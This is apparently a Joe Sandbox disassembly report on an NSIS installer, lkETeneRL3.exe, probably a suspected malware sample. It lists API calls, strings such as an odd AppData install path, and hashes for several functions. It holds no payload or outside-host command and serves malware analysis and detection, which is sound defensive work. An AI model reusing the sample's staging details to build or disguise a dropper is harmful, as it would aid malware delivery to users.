C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403409, 0040340E, 00403424, 00403430, 0040343F, 0040344C, 00403458, 00403460, 00403559, 0040356A, 00403575, 00403581, 0040358E, 0040359D, 0040364C
TMP, xrefs: 00403461
\Temp, xrefs: 0040342B
SeShutdownPrivilege, xrefs: 0040367F
C:\Users\user\Desktop, xrefs: 0040357B, 00403580, 004035AC
TEMP, xrefs: 00403459
UXTHEME, xrefs: 00403273, 00403278, 0040327E
C:\Users\user\AppData\Roaming\china\Mixeren\verbalises, xrefs: 00403505

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
String ID: "$"C:\Users\user\Desktop\lkETeneRL3.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\china\Mixeren\verbalises$C:\Users\user\AppData\Roaming\china\Mixeren\verbalises$C:\Users\user\Desktop$C:\Users\user\Desktop\lkETeneRL3.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$error$~nsu
API String ID: 3329125770-1457395880
Opcode ID: 5e28d8b8d97ca94594f0498f32c0c003763ec4c232e88559ae5a69b57df92bfb
Instruction ID: 576d03f4a97a107fe364ed0b5bad1c5a822c5763e21245f1fe88aefb499f64b7
Opcode Fuzzy Hash: 5e28d8b8d97ca94594f0498f32c0c003763ec4c232e88559ae5a69b57df92bfb
Instruction Fuzzy Hash: 4DC106706082417AE7216F319D4DA2B3EA9EF85746F04457FF481B61E2CB7C9A01CB6E

Function 004051BA Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405219
GetDlgItem.USER32(?,000003EE), ref: 00405228
GetClientRect.USER32(?,?), ref: 00405265
GetSystemMetrics.USER32(00000002), ref: 0040526C
SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040528D
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040529E
SendMessageA.USER32(?,00001001,00000000,?), ref: 004052B1
SendMessageA.USER32(?,00001026,00000000,?), ref: 004052BF
SendMessageA.USER32(?,00001024,00000000,?), ref: 004052D2
ShowWindow.USER32(00000000,?,0000001B,?), ref: 004052F4
ShowWindow.USER32(?,00000008), ref: 00405308
GetDlgItem.USER32(?,000003EC), ref: 00405329
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405339
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405352
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040535E
GetDlgItem.USER32(?,000003F8), ref: 00405237

Part of subcall function 0040407D: SendMessageA.USER32(00000028,?,00000001,00403EAE), ref: 0040408B

GetDlgItem.USER32(?,000003EC), ref: 0040537A
CreateThread.KERNELBASE(00000000,00000000,Function_0000514E,00000000), ref: 00405388
CloseHandle.KERNELBASE(00000000), ref: 0040538F
ShowWindow.USER32(00000000), ref: 004053B2
ShowWindow.USER32(?,00000008), ref: 004053B9
ShowWindow.USER32(00000008), ref: 004053FF
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405433
CreatePopupMenu.USER32 ref: 00405444
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405459
GetWindowRect.USER32(?,000000FF), ref: 00405479
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405492
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054CE
OpenClipboard.USER32(00000000), ref: 004054DE
EmptyClipboard.USER32 ref: 004054E4
GlobalAlloc.KERNEL32(00000042,?), ref: 004054ED
GlobalLock.KERNEL32(00000000), ref: 004054F7
SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040550B
GlobalUnlock.KERNEL32(00000000), ref: 00405524
SetClipboardData.USER32(00000001,00000000), ref: 0040552F
CloseClipboard.USER32 ref: 00405535

Strings

di, xrefs: 00405409
Tristram Setup: Completed, xrefs: 004054AA

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: Tristram Setup: Completed$di
API String ID: 590372296-3463735291
Opcode ID: fe1231e838d9c77fe43e8816ae8d8cc6e8335f7b6b0fb41219e32569c20c3a75
Instruction ID: 22ae5336f142fb48a9cf727d400d9a9d64ef180589f118636d3b9fd0a83d5397
Opcode Fuzzy Hash: fe1231e838d9c77fe43e8816ae8d8cc6e8335f7b6b0fb41219e32569c20c3a75
Instruction Fuzzy Hash: 0FA147B1900208BFDB119FA0DD89EAE7BB9FB08355F00407AFA05B61A0C7B55E51DF69

Function 00405705 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,771B3410,771B2EE0,00000000), ref: 0040572E
lstrcatA.KERNEL32(00420D38,\*.*,00420D38,?,?,771B3410,771B2EE0,00000000), ref: 00405776
lstrcatA.KERNEL32(?,00409014,?,00420D38,?,?,771B3410,771B2EE0,00000000), ref: 00405797
lstrlenA.KERNEL32(?,?,00409014,?,00420D38,?,?,771B3410,771B2EE0,00000000), ref: 0040579D
FindFirstFileA.KERNELBASE(00420D38,?,?,?,00409014,?,00420D38,?,?,771B3410,771B2EE0,00000000), ref: 004057AE
FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040585B
FindClose.KERNEL32(00000000), ref: 0040586C

Strings

\*.*, xrefs: 00405770
"C:\Users\user\Desktop\lkETeneRL3.exe", xrefs: 00405705
8B, xrefs: 0040575E

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\lkETeneRL3.exe"$8B$\*.*
API String ID: 2035342205-3797081669
Opcode ID: ba4fb821376a9003d53046d742c818a2cf143102733a919c56b59d1ddb64c9ec
Instruction ID: 0bcf9a9e67a33d50b3dc7b196bcae3add4761e648fc1c1af8ecd3a5bcda4d25e
Opcode Fuzzy Hash: ba4fb821376a9003d53046d742c818a2cf143102733a919c56b59d1ddb64c9ec
Instruction Fuzzy Hash: 8F51A331800A08BADF217B658C89BAF7B78DF46754F14807BF851761D2C73C8991DEAA

Function 0040205E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189

Strings

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises, xrefs: 0040211D

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Roaming\china\Mixeren\verbalises
API String ID: 123533781-1206852091
Opcode ID: 814b7ea8dca6599385978487c0f202a2bde9097081401cb59e3c034f0ab4e669
Instruction ID: 56974f308a9a67f015f648966d3a58154011754483a046e15126684feee28a9b
Opcode Fuzzy Hash: 814b7ea8dca6599385978487c0f202a2bde9097081401cb59e3c034f0ab4e669
Instruction Fuzzy Hash: 255138B5A00208BFCF10DFA4C988A9D7BB5FF48318F20856AF515EB2D1DB799941CB54

Function 004064AE Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0a3870b215c6cb57f5be28c47361f52d581e4686ba2b9b0247380936f8f490c
Instruction ID: 4218cb5ebcdace98cdb1216374bea5ca06482cd82b52ee1cf8be947d1aeb6f3c
Opcode Fuzzy Hash: a0a3870b215c6cb57f5be28c47361f52d581e4686ba2b9b0247380936f8f490c
Instruction Fuzzy Hash: 29F17570D00269CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D3785A96CF44

Function 00406167 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(771B3410,00421580,C:\,00405A06,C:\,C:\,00000000,C:\,C:\,771B3410,?,771B2EE0,00405725,?,771B3410,771B2EE0), ref: 00406172
FindClose.KERNEL32(00000000), ref: 0040617E

Strings

C:\, xrefs: 00406167

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\
API String ID: 2295610775-3404278061
Opcode ID: f9303f41664d55177506eb3caad4b25aa18344ea0c32c7844788a1b00efad07c
Instruction ID: 121c98e09340d698ac486e65b2e2524f4cd38212b93dde10f2a633de382b9f18
Opcode Fuzzy Hash: f9303f41664d55177506eb3caad4b25aa18344ea0c32c7844788a1b00efad07c
Instruction Fuzzy Hash: 82D012319190207FC34117396C0C84B7A589F653317528B33F86AF52F0D3349CA286ED

Function 00403B75 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BB1
ShowWindow.USER32(?), ref: 00403BCE
DestroyWindow.USER32 ref: 00403BE2
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BFE
GetDlgItem.USER32(?,?), ref: 00403C1F
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C33
IsWindowEnabled.USER32(00000000), ref: 00403C3A
GetDlgItem.USER32(?,00000001), ref: 00403CE8
GetDlgItem.USER32(?,00000002), ref: 00403CF2
SetClassLongA.USER32(?,000000F2,?), ref: 00403D0C
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D5D
GetDlgItem.USER32(?,00000003), ref: 00403E03
ShowWindow.USER32(00000000,?), ref: 00403E24
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E36
EnableWindow.USER32(?,?), ref: 00403E51
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E67
EnableMenuItem.USER32(00000000), ref: 00403E6E
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E86
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E99
lstrlenA.KERNEL32(Tristram Setup: Completed,?,Tristram Setup: Completed,00422F20), ref: 00403EC2
SetWindowTextA.USER32(?,Tristram Setup: Completed), ref: 00403ED1
ShowWindow.USER32(?,0000000A), ref: 00404005

Strings

di, xrefs: 00403F1F
Tristram Setup: Completed, xrefs: 00403EAE, 00403EB8, 00403EC1, 00403ECF

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: Tristram Setup: Completed$di
API String ID: 3282139019-3463735291
Opcode ID: 5db2143f2917a894034b19fc2abb5fc3ef727a551cec3093833a2ac212f5d40f
Instruction ID: c8c4f9f6fa32ab432123c95edc0b9dc077676c0f3e6a7dc1ab02adf3a8b3c805
Opcode Fuzzy Hash: 5db2143f2917a894034b19fc2abb5fc3ef727a551cec3093833a2ac212f5d40f
Instruction Fuzzy Hash: 54C1D3B1A04205BBDB206F61ED89D2B3A78FB85306F51443EF611B11F1C779A942AB1E

Function 004037E3 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004061FC: GetModuleHandleA.KERNEL32(?,?,?,00403295,00000009), ref: 0040620E
Part of subcall function 004061FC: GetProcAddress.KERNEL32(00000000,?), ref: 00406229

lstrcatA.KERNEL32(1033,Tristram Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Tristram Setup: Completed,00000000,00000002,771B3410,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\lkETeneRL3.exe",00000000), ref: 0040385E
lstrlenA.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Users\user\AppData\Roaming\china\Mixeren\verbalises,1033,Tristram Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Tristram Setup: Completed,00000000,00000002,771B3410), ref: 004038D3
lstrcmpiA.KERNEL32(?,.exe), ref: 004038E6
GetFileAttributesA.KERNEL32(Remove folder: ), ref: 004038F1
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\china\Mixeren\verbalises), ref: 0040393A

Part of subcall function 00405DC1: wsprintfA.USER32 ref: 00405DCE

RegisterClassA.USER32(00422EC0), ref: 00403977
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040398F
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039C4
ShowWindow.USER32(00000005,00000000), ref: 004039FA
GetClassInfoA.USER32(00000000,RichEdit20A,00422EC0), ref: 00403A26
GetClassInfoA.USER32(00000000,RichEdit,00422EC0), ref: 00403A33
RegisterClassA.USER32(00422EC0), ref: 00403A3C
DialogBoxParamA.USER32(?,00000000,00403B75,00000000), ref: 00403A5B

Strings

RichEd20, xrefs: 00403A00
"C:\Users\user\Desktop\lkETeneRL3.exe", xrefs: 004037E7
Remove folder: , xrefs: 004038A1, 004038A9, 004038B6, 00403900, 00403906
1033, xrefs: 00403803, 00403859
C:\Users\user\AppData\Roaming\china\Mixeren\verbalises, xrefs: 0040386D, 00403875, 0040390D, 00403913, 00403923
.DEFAULT\Control Panel\International, xrefs: 00403849
RichEdit, xrefs: 00403A2D
Control Panel\Desktop\ResourceLocale, xrefs: 00403817
_Nb, xrefs: 00403956, 004039BE
Tristram Setup: Completed, xrefs: 0040380F, 00403815, 0040383A, 00403843, 00403858
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004037E8
RichEd32, xrefs: 00403A0E
.exe, xrefs: 004038E0
RichEdit20A, xrefs: 00403A1E, 00403A24

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\lkETeneRL3.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\china\Mixeren\verbalises$Control Panel\Desktop\ResourceLocale$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20A$Tristram Setup: Completed$_Nb
API String ID: 1975747703-2344838927
Opcode ID: f321f38865debe7e05a28eb2188726e223bb839ce9309e8ec04d516c2c1b8f5e
Instruction ID: 6c8974e4dfdcf182ca6d095a6101ff5518a0df20e425d3d5ae506d2571b44078
Opcode Fuzzy Hash: f321f38865debe7e05a28eb2188726e223bb839ce9309e8ec04d516c2c1b8f5e
Instruction Fuzzy Hash: 076191B17442007ED620AF659D45F2B3AACEB8475AF40447FF941B22E2C7BC9D029A7D

Function 00402CB6 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402CCA
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\lkETeneRL3.exe,00000400), ref: 00402CE6

Part of subcall function 00405AD6: GetFileAttributesA.KERNELBASE(00000003,00402CF9,C:\Users\user\Desktop\lkETeneRL3.exe,80000000,00000003), ref: 00405ADA
Part of subcall function 00405AD6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AFC

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\lkETeneRL3.exe,C:\Users\user\Desktop\lkETeneRL3.exe,80000000,00000003), ref: 00402D2F
GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E76

Strings

Inst, xrefs: 00402D9D
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F0D
"C:\Users\user\Desktop\lkETeneRL3.exe", xrefs: 00402CB6
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402EBF
C:\Users\user\Desktop\lkETeneRL3.exe, xrefs: 00402CD0, 00402CDF, 00402CF3, 00402D10
Error launching installer, xrefs: 00402D06
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402CC0, 00402E8E
C:\Users\user\Desktop, xrefs: 00402D11, 00402D16, 00402D1C
soft, xrefs: 00402DA6
Null, xrefs: 00402DAF

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\lkETeneRL3.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\lkETeneRL3.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-1579562818
Opcode ID: 2876f998b4df774fb1c5612d1fda4f3509dfd8569b4d56476e84d5951189c2aa
Instruction ID: 6560279c47655c84bfe4d90bfb6f1ef804bba6314c77a30d8371cd5976d9e3e8
Opcode Fuzzy Hash: 2876f998b4df774fb1c5612d1fda4f3509dfd8569b4d56476e84d5951189c2aa
Instruction Fuzzy Hash: C66103B1A40215ABDB20AF60DE89B9E77B8EB04354F51413BF501B72D1D7BC9E818B9C

Function 00405E85 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(?,Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,00000000,004050B4,Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,00000000), ref: 00405F36
GetSystemDirectoryA.KERNEL32(Remove folder: ,00000400), ref: 00405FB1
GetWindowsDirectoryA.KERNEL32(Remove folder: ,00000400), ref: 00405FC4
SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00406000
SHGetPathFromIDListA.SHELL32(00000000,Remove folder: ), ref: 0040600E
CoTaskMemFree.OLE32(00000000), ref: 00406019
lstrcatA.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch), ref: 0040603B
